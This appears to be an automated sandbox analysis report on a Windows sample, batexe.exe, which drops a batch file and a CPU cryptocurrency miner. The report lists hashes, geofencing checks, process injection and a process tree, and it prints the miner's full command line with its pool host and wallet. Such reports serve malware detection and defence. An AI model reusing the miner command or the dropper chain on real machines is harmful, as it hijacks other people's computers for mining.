Analysis
max time kernel: 293s
max time network: 299s
platform: windows10-2004_x64
resource: win10v2004-20231215-ja
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system, windows
submitted: 20/02/2024, 17:00
Behavioral task behavioral1: sample batexe.exe, resource win10-20240214-ja
Behavioral task behavioral2: sample batexe.exe, resource win10v2004-20231215-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | batexe.exe
Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | b2e.exe

Executes dropped EXE (2 IoCs)
pid | Process
2256 | b2e.exe
3760 | cpuminer-sse2.exe

Loads dropped DLL (5 IoCs)
pid | Process
3760 | cpuminer-sse2.exe (5 identical entries, one per loaded DLL)

resource | yara_rule
behavioral2/memory/4916-9-0x0000000000400000-0x000000000393A000-memory.dmp | upx

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 4916 wrote to memory of 2256 | 4916 | batexe.exe | 85 (3 identical entries)
PID 2256 wrote to memory of 4280 | 2256 | b2e.exe | 86 (3 identical entries)
PID 4280 wrote to memory of 3760 | 4280 | cmd.exe | 89 (2 identical entries)
Processes

1. C:\Users\Admin\AppData\Local\Temp\batexe.exe (PID 4916)
   Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Local\Temp\6B0E.tmp\b2e.exe (PID 2256)
      Command line: "C:\Users\Admin\AppData\Local\Temp\6B0E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6B0E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\cmd.exe (PID 4280)
         Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6F35.tmp\batchfile.bat" "
         - Suspicious use of WriteProcessMemory

         4. C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe (PID 3760)
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
            - Executes dropped EXE
            - Loads dropped DLL
Network
MITRE ATT&CK Enterprise v15
Downloads